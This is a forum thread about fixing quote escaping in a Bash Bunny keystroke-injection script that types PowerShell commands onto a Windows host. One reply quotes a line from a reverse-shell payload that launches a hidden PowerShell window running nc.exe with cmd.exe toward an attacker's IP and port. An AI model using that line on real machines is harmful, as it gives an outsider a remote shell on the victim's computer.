Jump to content

Simple payload gets stuck halfway through


HamHack

Recommended Posts

Hey.

For some reason my Bash Bunny script gets stuck right after opening up the powershell, but I can't seem to figure out why it's happening. I tried replacing the line right under the 500 delay with a simple string, which made it work, but it won't work as is.

This is my script:

LED SETUP

ATTACKMODE HID STORAGE

LED ATTACK

Q SET_LANGUAGE gb

Q GUI r
Q DELAY 150
Q STRING powershell
Q ENTER

Q DELAY 500

Q STRING cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)
Q ENTER
Q STRING cd payloads/switch1
Q ENTER

LED FINISH

Link to comment
Share on other sites

@HamHack, just use some quotes around the string:

 

Q STRING '''cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)'''

Also think about to use 

RUN WIN powershell

 

Link to comment
Share on other sites

@GermanNoob That was definitely an improvement, as it's now being written out, but the string is missing the single quotes around the word BashBunny.

It's being written like this: cd (gwmi -class win32_volume -filter "label=BashBunny").Name.Substring(0,2)

But I need it to write it like this: cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)

How do I get it to include the single quotes as well?

Link to comment
Share on other sites

@GermanNoob That was definitely an improvement, as it's now being written out, but the string is missing the single quotes around the word BashBunny.

It's being written like this: 

cd (gwmi -class win32_volume -filter "label=BashBunny").Name.Substring(0,2)

But I need it to write it like this: 

cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)

How do I get it to include the single quotes as well?

Link to comment
Share on other sites

I'm not a powershell guy to be honest... 

But why aren't you using the similar commands from other payloads, e.g. RAZ_ReverseShell

QUACK STRING powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\"

 

Link to comment
Share on other sites

Issue is with how bash on the Bunny is interpreting your string.  An example is echo that line in a Linux bash terminal and you will see the issue.  Like replace "quack string" with echo..if you have access to a bash terminal.  If not then here is a trick to do.

After your QUACK STRING, encapsulate the whole command in double quotes.  Once you do that, you will only need to escape "$" and other inner double quotes.  Single quotes can be by themselves without needing to escape.  Example.

Q STRING "cd (gwmi -class win32_volume -filter \"label='BashBunny'\").Name.Substring(0,2)"

That should fix your issue without changing your method.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...